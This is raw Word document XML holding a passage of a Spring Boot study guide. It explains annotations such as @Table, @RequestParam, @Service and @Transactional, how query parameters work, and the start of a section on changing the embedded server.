          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to define an entity class in JPA (Java Persistence API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2643C17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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is used for mapping Java objects to database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1062C79B"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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38904E1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User {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130FA3F7"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1200A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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAF591C"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FA7698"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17A45C98"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11. @Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1780EF9D"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the table to be used for mapping an entity. It’s typically used with @Entity to specify the table name explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48751CF2"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows you to configure a custom table name for the entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE4519F"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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C1536"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able(name = "users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216660E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User {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA159A8"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fields and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF9820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4DFD69DB"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12. @RequestParam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD2DC5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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to bind request parameters to method parameters in controller methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5AB629"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Commonly used to extract query parameters from the request URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0B3F9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GetMapping("/greet")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6692CDD5"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String greet(@RequestParam String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EF3FA5"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Hello, " + name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D69598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4D9D9AC4"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13. @PathVariable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3247268C"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to extract values from the URL path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9E9E6D"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Commonly used in RESTful API paths to extract variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5630A612"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GetMapping("/user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235FDEBA"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String getUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF04569"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User ID: " + id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA39DB2"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32E57342"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14. @Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27836A4B"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Marks a class as a Spring bean that is automatically detected during classpath scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77918560"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to declare a bean in the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B6B4A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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E33FB"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MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5CE39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Service logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F934B8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40C46A2E"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15. @Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A4A24"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A specialized version of @Component, used for service classes that contain business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B2257"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Marks a service class, which is typically used for encapsulating business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50114696"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CDC04F"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UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D576C0C"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Service logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD8B790"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2E06F9C9"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16. @Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA97234"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A specialized version of @Component, used for data access layer components like DAOs (Data Access Objects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8F1B17"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Marks a DAO class, which is responsible for interacting with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F3844"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE6CBC"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UserRepository {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE2EA8"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Repository logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE0AC02"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1933C5C9"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17. @EnableAutoConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723769A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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is used to enable Spring Boot’s auto-configuration feature, which automatically configures various Spring components based on the application’s classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DC8634"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lastRenderedPageBreak/>
        <w:t>Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is typically included as part of @SpringBootApplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115599F"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18. @EnableAspectJAutoProxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C15B5"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enables Spring AOP (Aspect-Oriented Programming) support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F799ECA"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Required to enable aspect-oriented programming in a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CD83A6"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EnableAspectJAutoProxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02405019"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nfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784D8BEC"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AopConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FDC975"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AOP configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10266D7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2D43220A"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19. @Transactional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037D9402"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Marks a method or class to be transactional, meaning all database operations inside it will be committed or rolled back together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A3B0F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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Typically used on service methods that interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C811CD"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ransactional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5FAFCD"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void transferFunds(Account fromAccount, Account toAccount, Double amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E82C82"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logic to transfer funds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5600335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60BD9E30"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A89A0"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se annotations enable the core features of Spring Boot, such as automatic configuration, dependency injection, web development, JPA, AOP, and more. They reduce the amount of boilerplate code needed for configuration and help in building robust, production-ready applications quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939F141" w14:textId="747F0930"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5E45AE0">
          <v:rect id="_x0000_i2518" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A9DB7" w14:textId="14AFAC8E" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00A7515E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="582" w:name="_Toc196308062"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the query parameter</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="582"/>
    </w:p>
    <w:p w14:paraId="7F401902" w14:textId="4A589F31" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>query parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a part of the URL that is used to send data to the server in the form of key-value pairs. It typically comes after a question mark (?) in the URL and is used to filter or modify the request sent to the server. Multiple query parameters are separated by an ampersand (&amp;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590C66F3"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Structure of Query Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD6509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A query parameter consists of two parts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DF9D27"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Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The name of the parameter (e.g., name, id, page).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589CE69D"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Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The value of the parameter (e.g., John, 123, 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16480235"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 of Query Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638977A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A URL with query parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC1328B"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https://example.com/search?query=Spring&amp;sort=asc&amp;page=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBCBA4A"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Here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4380C6"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query</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the key, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is its value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0083F"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sort</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the key, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asc</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is its value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703903F8"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the key, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is its value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565A2BF1"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Usage of Query Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C54974A"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Filtering</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To filter data on the server, such as searching for items based on certain criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343CCA7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agination</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Often used for pagination in lists (e.g., page=2 for the second page of results).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F6C14"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Sorting</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To specify how the results should be sorted (e.g., sort=desc).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05520DF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State</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To maintain some state information across requests, like an authentication token or session ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EF6AC4"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 in Spring Boot Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DFC275"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You can access query parameters in a Spring Boot controller using @RequestParam.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0133F9D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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42057AC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SearchController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67435EC2" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E972E9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GetMapping("/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E22E58"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String search(@RequestParam String query, @RequestParam String sort, @RequestParam int page) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818AC4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Searching for " + query + ", sorting by " + sort + " on page " + page;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3594FBA0"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2F8603F0"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4351EDB9"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f you send a request like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39199C6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GET /search?query=Spring&amp;sort=asc&amp;page=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26915510"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 output will be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30790B26"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lastRenderedPageBreak/>
        <w:t>Searching for Spring, sorting by asc on page 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAFD308" w14:textId="47D6ADEE"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9CF1147">
          <v:rect id="_x0000_i2519" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D95DD" w14:textId="690F605B" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD1731">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="583" w:name="_Toc196308063"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to change the server in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="583"/>
    </w:p>
    <w:p w14:paraId="502DB6B0" w14:textId="67B8E53D" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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In Spring Boot, you can change the embedded server (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jetty</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Undertow</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) by configuring the application properties or by adding specific dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C65D8D"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1. Change the Embedded Server via application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FF9502"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Spring Boot uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
